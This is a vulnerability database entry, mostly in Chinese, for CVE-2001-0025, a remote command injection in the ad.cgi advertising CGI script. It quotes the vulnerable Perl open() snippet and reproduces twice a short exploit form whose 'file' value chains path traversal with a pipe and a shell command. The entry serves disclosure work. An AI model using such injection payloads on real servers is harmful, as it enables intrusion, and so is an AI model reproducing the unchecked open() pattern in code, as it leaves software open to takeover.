CVE-2001-0025
CVSS10.0
发布时间 :2001-02-12 00:00:00
修订时间 :2008-09-05 16:23:04
NMCOES    

[原文]ad.cgi CGI program by Leif Wright allows remote attackers to execute arbitrary commands via shell metacharacters in the file parameter.


[CNNVD]Leif M. Wright ads.cgi远程执行任意命令漏洞(CNNVD-200102-023)

        
        Leif Wright开发的ads.cgi程序是一个免费的广告轮换脚本。
        ads.cgi存在一个安全问题,攻击者可能利用这个漏洞在WEB服务器上执行任意命令。
        由于脚本没有检查用户输入的变量内容就直接使用open()打开,如果攻击者在变量中输入"|"以及shell命令,就可以以HTTPD进程的运行权限执行任意命令。
        有问题的代码部分如下:
        ----code snippet----
        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        ....
        open (INFO, "$datafile");
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0025
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0025
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200102-023
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5741.php
(VENDOR_ADVISORY)  XF  http-cgi-ad
http://www.securityfocus.com/bid/2103
(VENDOR_ADVISORY)  BID  2103
http://archives.neohapsis.com/archives/bugtraq/2000-12/0143.html
(UNKNOWN)  BUGTRAQ  20001211 Insecure input validation in ad.cgi

- 漏洞信息

Leif M. Wright ads.cgi远程执行任意命令漏洞
危急 输入验证
2001-02-12 00:00:00 2006-08-16 00:00:00
远程  
        
        Leif Wright开发的ads.cgi程序是一个免费的广告轮换脚本。
        ads.cgi存在一个安全问题,攻击者可能利用这个漏洞在WEB服务器上执行任意命令。
        由于脚本没有检查用户输入的变量内容就直接使用open()打开,如果攻击者在变量中输入"|"以及shell命令,就可以以HTTPD进程的运行权限执行任意命令。
        有问题的代码部分如下:
        ----code snippet----
        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        ....
        open (INFO, "$datafile");
        

- 公告与补丁

        厂商补丁:
        Leif M. Wright
        --------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.conservatives.net/atheist/scripts/index.html?ads

- 漏洞信息 (20504)

Leif M. Wright ad.cgi 1.0 Unchecked Input Vulnerability (EDBID:20504)
cgi remote
2000-12-11 Verified
0 rpc
N/A [点击下载]
source: http://www.securityfocus.com/bid/2103/info

ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources.

The problem occurs in the method in which the script checks input. Due to insufficent validation of input, the script allows a user to execute programs on the local system by making use of the FORM method. This makes it possible for a malicious users to remotely execute commands on the system with the priviledges inherited by the HTTPD process. 

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html> 		

- 漏洞信息

13123
Leif Wright ad.cgi file Parameter Traversal Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-12-11 Unknow
2000-12-11 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Leif M. Wright ad.cgi Unchecked Input Vulnerability
Input Validation Error 2103
Yes No
2000-12-11 12:00:00 2009-07-11 04:46:00
This vulnerability was first announced by rpc <h@ckz.org> via Bugtraq on December 11, 2000.

- 受影响的程序版本

Leif M. Wright ad.cgi 1.0
- AT&T SVR4 4.0
- Be BeOS 5.0
- BSDI BSD/OS 4.0.1
- Caldera OpenLinux 2.4
- Conectiva Linux 6.0
- Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- FreeBSD FreeBSD 4.2
- HP HP-UX 11.11
- IBM AIX 4.3.3
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.4.2
- OpenBSD OpenBSD 2.8
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- SCO eServer 2.3
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc

- 漏洞讨论

ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources.

The problem occurs in the method in which the script checks input. Due to insufficent validation of input, the script allows a user to execute programs on the local system by making use of the FORM method. This makes it possible for a malicious users to remotely execute commands on the system with the priviledges inherited by the HTTPD process.

- 漏洞利用

From the advisory by rpc &lt;h@ckz.org&gt; :

&lt;html&gt;
&lt;form action="http://www.conservatives.net/someplace/ad.cgi" method=POST&gt;
&lt;h1&gt;ad.cgi exploit&lt;/h1&gt;
Command: &lt;input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|"&gt;
&lt;input type=submit value=run&gt;
&lt;/form&gt;
&lt;/html&gt;

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站